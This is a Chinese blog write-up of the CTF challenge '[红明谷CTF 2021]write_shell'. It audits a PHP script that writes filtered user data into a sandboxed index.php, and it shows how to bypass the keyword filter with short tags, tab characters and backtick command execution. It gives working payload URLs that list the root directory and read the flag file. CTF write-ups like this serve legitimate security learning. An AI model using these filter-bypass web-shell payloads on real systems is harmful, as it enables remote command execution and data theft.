[红明谷CTF 2021]write_shell 1

最新推荐文章于 2024-02-20 14:29:27 发布
最新推荐文章于 2024-02-20 14:29:27 发布
阅读量968 收藏 4
点赞数 1
分类专栏: buuctf 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/125015741
版权

在这里插入图片描述
进入环境,首先进行代码审计

代码审计

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
      //遍历数组
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);  //创建文件夹
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
    //  file_put_contents()   
    
}
?>

file_put_contents()

file 必需。规定要写入数据的文件。如果文件不存在,则创建一个新文件。
data 必需。规定要写入文件的数据。可以是字符串、数组或数据流。
mode 可选。规定如何打开/写入文件。

先了解下 ??的作用

switch($_GET["action"] ?? "") 

?? 判断一个变量是否存在 ,存在则赋值变量本身,不存在赋值另一变量
?? 相当于:isset($a)? $a :$b;
是php7 推出来的
可以简单理解为 用于简便三元表达式

eg:

$a = $a ?? 1;
var_dump($a);//1


$a = 50
$a = $a ?? 1;
var_dump($a);//0

先看下面的代码:

switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
    //  file_put_contents()   
    
}

判断get传参(action)是否存在
当action = pwd 就会输出  dir
当action = upload 会检测我们的data是否存在 并对data进行一个过滤,并且作为 file_put_contents()的第三个参数

function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
      //遍历数组
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

发现对data参数进行过滤(包括 php  eval 等),这里就在提示我们使用 php标签 

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);  //创建文件夹

同时 我们输入的 data 进行MD5加密,在与sandbox进行结合
在生成新的文件加存放 $dir

所以,在本题我们的思路是:
先切换到 upload模式 传入数据参数 ,将数据存放到新文件夹
然后切换到 pwd模式 获得 MD5 加密后的dir
直接输入获得的密码 (查询以dir命名的文件夹)即可获得我们查询的内容

还有一个问题就是 本关的敏感次过滤问题

正则匹配绕过

php短标签
php中的短标签
执行运算符

本关用到的短标签:

<?="1"?>	//相当于<?php echo "1";?>
<?echo"1"?>
<% echo"1";%>	//此标签有的版本行不通x

空格过滤饶过

%09   <    >   <>   $IFS$9   ${IFS}

单引号 包裹可以使用 ` 代替

echo `你好`

payload绕过

先访问:

http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=upload&data=<?echo%09`ls%09/`?>

再访问:

http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=pwd

在这里插入图片描述

再直接访问

http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/sandbox/c47b21fcf8f0bc8b3920541abd8024fd/

在这里插入图片描述
再访问 flag

http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=upload&data=%3C?echo%09`cat%09/flllllll1112222222lag`?%3E

http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/?action=pwd

http://71a146f3-19e0-4c62-8a38-95956855423d.node4.buuoj.cn/sandbox/c47b21fcf8f0bc8b3920541abd8024fd/

在这里插入图片描述

hcjtn
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大数据-算法-朝鲜数学的儒学化倾向.pdf
04-18
作者崔锡鼎,字明谷,号锡鼎,是李朝肃宗时期的大臣,著有《经世正韵图说》和《明谷集》,并编纂了《左氏辑选》。这一部分还简要介绍了崔锡鼎所处时代的党派冲突,并参考了《李朝实录》中关于他的相关记载。 第二...
[红明谷CTF 2021]write_shell1
最新发布
wwwyyyxxxx的博客
03-04 400
换行绕过也不行,check函数虽然看着过滤的不多,但是一些关键的被过滤了,让写入空的php文件但是又把分号过滤了,这里在本地试了一下,发现短标签不需要分号,但是这样在本地会莫名其妙的输出1,有没有大佬解释一下。但是想传system("ls /")的时候又有个问题是空格被过滤了,这里要用到一个函数是hen2bin()将十六进制转换为二进制编码后的字符串,ls / 十六进制编码是6C73202F。这里check函数是嵌套在waf里面的,waf嵌套做了一个数组的判断,而check才是真正的waf。
[红明谷CTF 2021]write_shell
pakho_C的博客
09-11 273
题目提示写shell,结合代码分析,action参数输入pwd可以获取沙盒路径,输入upload并添加data参数,可以把经过waf函数过滤后的命令执行代码或者shell写入index.php中。过滤单引号,可以使用反引号绕过,在php中,被反引号包裹的代码会被当做命令执行。需要完成的就是绕过waf函数的检测,waf函数使用了递归,过滤了’ 空格 _ php;过滤php目的是过滤php标签
ctf 绕过php,浅析CTF绕过字符数字构造shell
weixin_32101285的博客
03-19 5248
原标题:浅析CTF绕过字符数字构造shell12/14本文字数3734前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflat...
ctf题库 web php越权,刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)
weixin_32050033的博客
03-24 616
目录刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)一、涉及知识点1、无数字字母shell2、利用.htaccess上传文件3、绕过open_basedir/disable_function的几种方法刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)题目复现链接:https://buuoj.cn/challenges参考链接:SUCTF-20192019 SUCT...
红明谷杯数据安全大赛
qq_53755216的博客
04-04 299
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
BUUCTF--[红明谷CTF 2021]write_shell
qq_46263951的博客
07-21 1106
补充知识点: PHP中??的作用 $a??$b; $a是不是null,如果不为null,则返回$a,否则返回$b; PHP中的短标签 先来看第一部分代码, 当action=pwd时则给出路径;当action=upload时,可以上传参数data $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/'; if(!file_exists($dir)){ mkdir($dir); } switch($_GET["action"] ?
BUUCTF:[红明谷CTF 2021]write_shell --- php 短标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1375
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑短标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP短标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP短标签 关于PHP的??这个东西:讲
2021红明谷杯数据安全大赛技能场景赛-Writeup
末初的CSDN博客
04-03 6985
文章目录Webwrite_shellhappysqleasytpjavawebMisc签到InputMonitor我的心是冰冰的歪比歪比babytraffic 后续题目知道怎么做了,跟进复现会把wp补上 Web write_shell 第一步主要考察PHP代码执行,第一步先写个phpinfo()看下情况。利用php的一种短标签可以绕过分号,然后拼接一下绕过php字样。 /?action=upload&data=<?=(p.hpinfo)()?> 沙盒路径?action=pwd
2021CTF红明谷杯数据安全大赛 write_shell
她叫常玉莹
07-30 758
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input;
[红明谷CTF 2021]write_shell --不会编程的崽
不会编程的崽的博客
02-20 581
命令执行
BUUCTF-[红明谷CTF 2021]write_shell
qq_24033605的博客
11-02 530
[红明谷CTF 2021]write_shell 源码放出来了,直接进行代码审计: 从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。 首先进行pwd操作,查看当前目录: 接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件: /?action=upload&data=&lt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值